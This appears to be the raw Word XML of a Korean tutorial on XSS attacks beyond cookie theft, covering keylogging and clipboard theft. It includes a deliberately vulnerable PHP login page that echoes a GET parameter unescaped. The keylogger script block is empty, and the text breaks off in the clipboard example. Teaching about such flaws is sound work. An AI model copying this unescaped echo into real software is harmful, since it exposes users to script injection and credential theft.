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5227E" w14:textId="77777777" w:rsidR="003F170A" w:rsidRPr="005904AE" w:rsidRDefault="003F170A" w:rsidP="003F170A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>크로스</w:t>
      </w:r>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61690FB1" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="003F170A" w:rsidP="003F170A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BE3ED" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="003F170A" w:rsidP="003F170A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS 공격은 주로 사용자의 인증정보를 가로채 공격자가 인증을 우회하기 위한 목적으로 활용되며 주로 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00182BCA">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통한 인증정보 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>두</w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 경우가 있다. 이에 XSS를 활용한 다른 유형의 공격을 알아보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3C0C9" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="003F170A"/>
    <w:p w14:paraId="7DF78FA5" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="00182BCA" w:rsidP="00182BCA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EA8BA" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRPr="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="00182BCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 구문 삽입을 이용해서 다른 사용자에게 피해를 입힐 수 있는 다양한 방법을 알아본다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB9DBE" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="00182BCA"/>
    <w:p w14:paraId="6BCF6860" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입력 값 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE40983" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00010531" w:rsidP="00182BCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">키보드 입력 값을 가로채 기록하는 행위를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>키로깅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Keylogging)이라 한다. 다음은 짧은 스크립트 코드를 삽입하여 사용자의 입력 값을 가로채는 공격의 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DA9F3" w14:textId="39266E03" w:rsidR="00010531" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인 페이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576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00684E4C" w14:paraId="00D26F9E" w14:textId="77777777" w:rsidTr="00D16879">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3B789075" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:left="800"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4AA755" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="500" w:left="1000"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;head&gt;Login Page&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A021EA7" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="500" w:left="1000"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5EBE0A" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="600" w:left="1200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;form action=</w:t>
            </w:r>
            <w:r>
              <w:t>”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login_submit.php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method=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>post</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AD6982" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;label&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> :&lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB5A54C" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;input type=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>text</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> name=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r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>/&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79934539" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;label&gt;Password :&lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D39C23" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;input type=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> name=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E19AAEE" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;input type=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>hidden</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> name=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>redirectUrl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value=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> echo $_GET[</w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]; ?&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49BF397D" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;input type=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>submit</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> value=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Submit</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480D3FC2" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="600" w:left="1200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F53DD07" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="500" w:left="1000"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="623405E1" w14:textId="0F53306F" w:rsidR="00684E4C" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00684E4C" w14:paraId="25275747" w14:textId="77777777" w:rsidTr="00D16879"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2410C2F0" w14:textId="77777777" w:rsidR="00684E4C" w:rsidRPr="009C2CA8" w:rsidRDefault="00684E4C" w:rsidP="00D16879">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2CA8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3213300E" w14:textId="194D3D3E" w:rsidR="00684E4C" w:rsidRDefault="00AD7532" w:rsidP="00D16879">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43332FFE" wp14:editId="1DC4ED28">
                  <wp:extent cx="5943600" cy="3923030"/>
                  <wp:effectExtent l="0" t="0" r="0" b="127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2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731D9" w14:textId="77777777" w:rsidR="00496245" w:rsidRDefault="00496245" w:rsidP="00496245"/>
    <w:p w14:paraId="5AC44703" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="002C1CD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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1CD1" w14:paraId="7F400EFD" w14:textId="77777777" w:rsidTr="007164AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="36E5165B" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9779DA" w14:textId="79D4668A" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF"/>
          <w:p w14:paraId="072A5D0A" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1CD1" w14:paraId="2995FB3F" w14:textId="77777777" w:rsidTr="007164AF">
        <w:trPr>
          <w:trHeight w:val="304"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="578BEF41" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRPr="00684E4C" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2CA8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E66674F" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21E14943" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="00496245"/>
    <w:p w14:paraId="3620139F" w14:textId="7C59AA08" w:rsidR="00496245" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
      </w:r>
      <w:r w:rsidR="008C3A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:t xml:space="preserve">Reflected XSS </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점이 발생한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78D393" w14:textId="77777777" w:rsidR="00B813AF" w:rsidRDefault="00B813AF" w:rsidP="00496245"/>
    <w:p w14:paraId="16DCEA06" w14:textId="77777777" w:rsidR="00B813AF" w:rsidRPr="00B813AF" w:rsidRDefault="00B813AF" w:rsidP="00496245"/>
    <w:p w14:paraId="5E82D41C" w14:textId="77777777" w:rsidR="00E81139" w:rsidRDefault="00E81139" w:rsidP="00182BCA"/>
    <w:p w14:paraId="077DB46F" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클립보드 값 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FC20A" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>키로깅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43F0EB" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="009E0257" w:rsidP="009C2CA8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클립보드 복사</w:t>
      </w:r>
      <w:r w:rsidR="009C2CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C2CA8" w14:paraId="4227BA5B" w14:textId="77777777" w:rsidTr="009C2CA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="657E47CD" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38957AE9" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599904A6" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E54437F" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;meta http-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>equiv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>="Content-Type" content="text/html; charset=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>euc-kr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE4E41" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;title&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>중요테이터를</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 복사하세요&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FCFBC3" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script src="https://cdn.jsdelivr.net/clipboard.js/1.5.3/clipboard.min.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6253541C" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;script </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
